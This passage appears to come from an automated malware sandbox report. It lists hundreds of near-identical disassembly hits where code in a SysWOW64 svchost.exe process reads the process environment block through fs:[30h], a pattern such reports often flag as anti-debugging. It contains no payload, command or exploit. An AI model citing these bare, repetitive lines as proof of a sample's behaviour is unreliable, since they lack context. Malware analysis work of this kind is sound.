                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B2349 mov eax, dword ptr fs:[00000030h]4_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov ecx, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B035C mov eax, dword ptr fs:[00000030h]4_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FA352 mov eax, dword ptr fs:[00000030h]4_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D8350 mov ecx, dword ptr fs:[00000030h]4_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D437C mov eax, dword ptr fs:[00000030h]4_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302E388 mov eax, dword ptr fs:[00000030h]4_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305438F mov eax, dword ptr fs:[00000030h]4_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305438F mov eax, dword ptr fs:[00000030h]4_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03028397 mov eax, dword ptr fs:[00000030h]4_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EC3CD mov eax, dword ptr fs:[00000030h]4_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0303A3C0 mov eax, dword ptr fs:[00000030h]4_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030383C0 mov eax, dword ptr fs:[00000030h]4_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B63C0 mov eax, dword ptr fs:[00000030h]4_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov ecx, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030DE3DB mov eax, dword ptr fs:[00000030h]4_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D43D4 mov eax, dword ptr fs:[00000030h]4_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030D43D4 mov eax, dword ptr fs:[00000030h]4_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030403E9 mov eax, dword ptr fs:[00000030h]4_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0304E3F0 mov eax, dword ptr fs:[00000030h]4_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030663FF mov eax, dword ptr fs:[00000030h]4_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302823B mov eax, dword ptr fs:[00000030h]4_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B8243 mov eax, dword ptr fs:[00000030h]4_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B8243 mov ecx, dword ptr fs:[00000030h]4_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302A250 mov eax, dword ptr fs:[00000030h]4_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03036259 mov eax, dword ptr fs:[00000030h]4_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA250 mov eax, dword ptr fs:[00000030h]4_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030EA250 mov eax, dword ptr fs:[00000030h]4_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03034260 mov eax, dword ptr fs:[00000030h]4_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0302826B mov eax, dword ptr fs:[00000030h]4_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030E0274 mov eax, dword ptr fs:[00000030h]4_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E284 mov eax, dword ptr fs:[00000030h]4_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0306E284 mov eax, dword ptr fs:[00000030h]4_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B0283 mov eax, dword ptr fs:[00000030h]4_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h]4_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030C62A0 mov ecx, dword ptr fs:[00000030h]4_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h] | 4_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h] | 4_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h] | 4_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C62A0 mov eax, dword ptr fs:[00000030h] | 4_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h] | 4_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h] | 4_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h] | 4_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h] | 4_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303A2C3 mov eax, dword ptr fs:[00000030h] | 4_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h] | 4_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h] | 4_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030402E1 mov eax, dword ptr fs:[00000030h] | 4_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov eax, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DE10E mov ecx, dword ptr fs:[00000030h] | 4_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DA118 mov ecx, dword ptr fs:[00000030h] | 4_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h] | 4_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h] | 4_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030DA118 mov eax, dword ptr fs:[00000030h] | 4_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F0115 mov eax, dword ptr fs:[00000030h] | 4_2_030F0115
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03060124 mov eax, dword ptr fs:[00000030h] | 4_2_03060124
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h] | 4_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h] | 4_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C4144 mov ecx, dword ptr fs:[00000030h] | 4_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h] | 4_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C4144 mov eax, dword ptr fs:[00000030h] | 4_2_030C4144
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302C156 mov eax, dword ptr fs:[00000030h] | 4_2_0302C156
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C8158 mov eax, dword ptr fs:[00000030h] | 4_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03036154 mov eax, dword ptr fs:[00000030h] | 4_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03036154 mov eax, dword ptr fs:[00000030h] | 4_2_03036154
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03070185 mov eax, dword ptr fs:[00000030h] | 4_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030EC188 mov eax, dword ptr fs:[00000030h] | 4_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030EC188 mov eax, dword ptr fs:[00000030h] | 4_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D4180 mov eax, dword ptr fs:[00000030h] | 4_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D4180 mov eax, dword ptr fs:[00000030h] | 4_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B019F mov eax, dword ptr fs:[00000030h] | 4_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B019F mov eax, dword ptr fs:[00000030h] | 4_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B019F mov eax, dword ptr fs:[00000030h] | 4_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B019F mov eax, dword ptr fs:[00000030h] | 4_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h] | 4_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h] | 4_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302A197 mov eax, dword ptr fs:[00000030h] | 4_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F61C3 mov eax, dword ptr fs:[00000030h] | 4_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F61C3 mov eax, dword ptr fs:[00000030h] | 4_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h] | 4_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h] | 4_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE1D0 mov ecx, dword ptr fs:[00000030h] | 4_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h] | 4_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE1D0 mov eax, dword ptr fs:[00000030h] | 4_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_031061E5 mov eax, dword ptr fs:[00000030h] | 4_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030601F8 mov eax, dword ptr fs:[00000030h] | 4_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B4000 mov ecx, dword ptr fs:[00000030h] | 4_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D2000 mov eax, dword ptr fs:[00000030h] | 4_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h] | 4_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h] | 4_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h] | 4_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304E016 mov eax, dword ptr fs:[00000030h] | 4_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302A020 mov eax, dword ptr fs:[00000030h] | 4_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302C020 mov eax, dword ptr fs:[00000030h] | 4_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C6030 mov eax, dword ptr fs:[00000030h] | 4_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03032050 mov eax, dword ptr fs:[00000030h] | 4_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B6050 mov eax, dword ptr fs:[00000030h] | 4_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0305C073 mov eax, dword ptr fs:[00000030h] | 4_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303208A mov eax, dword ptr fs:[00000030h] | 4_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030C80A8 mov eax, dword ptr fs:[00000030h] | 4_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F60B8 mov eax, dword ptr fs:[00000030h] | 4_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030F60B8 mov ecx, dword ptr fs:[00000030h] | 4_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B20DE mov eax, dword ptr fs:[00000030h] | 4_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302A0E3 mov ecx, dword ptr fs:[00000030h] | 4_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030380E9 mov eax, dword ptr fs:[00000030h] | 4_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B60E0 mov eax, dword ptr fs:[00000030h] | 4_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0302C0F0 mov eax, dword ptr fs:[00000030h] | 4_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030720F0 mov ecx, dword ptr fs:[00000030h] | 4_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C700 mov eax, dword ptr fs:[00000030h] | 4_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03030710 mov eax, dword ptr fs:[00000030h] | 4_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03060710 mov eax, dword ptr fs:[00000030h] | 4_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C720 mov eax, dword ptr fs:[00000030h] | 4_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306C720 mov eax, dword ptr fs:[00000030h] | 4_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306273C mov eax, dword ptr fs:[00000030h] | 4_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306273C mov ecx, dword ptr fs:[00000030h] | 4_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306273C mov eax, dword ptr fs:[00000030h] | 4_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AC730 mov eax, dword ptr fs:[00000030h] | 4_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306674D mov esi, dword ptr fs:[00000030h] | 4_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306674D mov eax, dword ptr fs:[00000030h] | 4_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0306674D mov eax, dword ptr fs:[00000030h] | 4_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03030750 mov eax, dword ptr fs:[00000030h] | 4_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BE75D mov eax, dword ptr fs:[00000030h] | 4_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03072750 mov eax, dword ptr fs:[00000030h] | 4_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03072750 mov eax, dword ptr fs:[00000030h] | 4_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B4755 mov eax, dword ptr fs:[00000030h] | 4_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03038770 mov eax, dword ptr fs:[00000030h] | 4_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03040770 mov eax, dword ptr fs:[00000030h] | 4_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030D678E mov eax, dword ptr fs:[00000030h] | 4_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030307AF mov eax, dword ptr fs:[00000030h] | 4_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030E47A0 mov eax, dword ptr fs:[00000030h] | 4_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0303C7C0 mov eax, dword ptr fs:[00000030h] | 4_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030B07C3 mov eax, dword ptr fs:[00000030h] | 4_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030527ED mov eax, dword ptr fs:[00000030h] | 4_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030527ED mov eax, dword ptr fs:[00000030h] | 4_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030527ED mov eax, dword ptr fs:[00000030h] | 4_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030BE7E1 mov eax, dword ptr fs:[00000030h] | 4_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030347FB mov eax, dword ptr fs:[00000030h] | 4_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030347FB mov eax, dword ptr fs:[00000030h] | 4_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_030AE609 mov eax, dword ptr fs:[00000030h] | 4_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0304260B mov eax, dword ptr fs:[00000030h] | 4_2_0304260B
